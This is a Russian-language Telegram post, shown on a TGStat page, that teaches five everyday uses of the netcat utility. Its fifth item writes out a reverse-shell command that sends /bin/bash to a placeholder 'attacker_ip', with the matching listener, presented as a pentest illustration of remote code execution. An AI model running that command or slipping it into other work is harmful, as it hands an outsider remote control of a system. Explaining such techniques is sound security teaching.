TGStat
TGStat
Введите текст для поиска
Расширенный поиск каналов
  • Язык сайта
    flag Russian flag English flag Uzbek
  • Вход на сайт
  • Каталог
    Каталог каналов и чатов Региональные подборки Тематические подборки Платные каналы Поиск каналов
    Добавить канал/чат
  • Рейтинги
    Рейтинг каналов Рейтинг чатов Рейтинг публикаций
    Рейтинги брендов и персон
  • Аналитика
  • Поиск по публикациям
  • Мониторинг Telegram
  • Продвижение
    Реклама через Яндекс Бизнес Реклама в каналах через TGStat Agency Реклама на сайте TGStat.ru
CodeGuard: Archive

6 Oct, 12:01

Открыть в Telegram Поделиться Пожаловаться

netcat: одна утилита, которая умеет всё

Сегодня разбираем инструмент, который появился в 1995 году и до сих пор стоит в арсенале каждого админа и пентестера. Netcat — «швейцарский нож TCP/IP». Одна команда — и ты можешь слушать порты, передавать файлы, сканировать сети и даже получить shell.

Что это
nc (или netcat) — утилита для работы с TCP и UDP. Она читает и пишет данные через сетевые соединения. Не имеет встроенного шифрования, не умеет в HTTP — но именно поэтому универсальна.
5 вещей, которые я делаю через netcat
1. Проверить, открыт ли порт
bash
nc -zv 192.168.1.1 22
Результат: Connection to 192.168.1.1 22 port [tcp/ssh] succeeded! Если порт закрыт — Connection refused.
Это быстрее, чем nmap, когда нужно проверить один порт.

2. Передать файл между машинами
На приёмнике:
nc -l -p 4444 > received_file

На отправителе:
nc 192.168.1.2 4444 < file_to_send
Файл ушёл. Без SCP, без FTP, без настройки. Если машины в одной сети — работает за секунды.

3. Слушать трафик на порту
nc -l -p 8080
Теперь всё, что приходит на порт 8080, выводится в терминал. Удобно для отладки: клиент стучится — ты видишь запрос.

4. Простой чат между двумя машинами
На первой:
nc -l -p 4444

На второй:
nc 192.168.1.2 4444
Пишешь текст — он появляется у собеседника. Небезопасно, но для быстрой связи в локальной сети работает.

5. Получить shell (если сервер уязвим)
Это классика пентеста. Если на сервере есть RCE, атакующий может запустить:
nc -e /bin/bash attacker_ip 4444

Тогда на машине атакующего:
nc -lvnp 4444
И он получает shell. Именно поэтому nc часто называют «backdoor в одну строку». В легальном пентесте это демонстрирует опасность RCE.

😈 CodeGuard: Archive

457 0 33 4
Каталог
Каталог каналов и чатов Подборки каналов Поиск каналов Добавить канал/чат
Рейтинги
Рейтинг каналов Telegram Рейтинг чатов Telegram Рейтинг публикаций Рейтинги брендов и персон
API
API статистики API поиска публикаций API Callback
Наши каналы
@TGStat @TGStat_Chat @telepulse @TGStatAPI
Почитать
Академия TGStat Исследование Telegram 2019 Исследование Telegram 2021 Исследование Telegram 2023
Контакты
Справочный центр Поддержка Почта Вакансии
Всякая всячина
Пользовательское соглашение Политика конфиденциальности Публичная оферта
Наши боты
@TGStat_Bot @SearcheeBot @TGAlertsBot @tg_analytics_bot @TGStatChatBot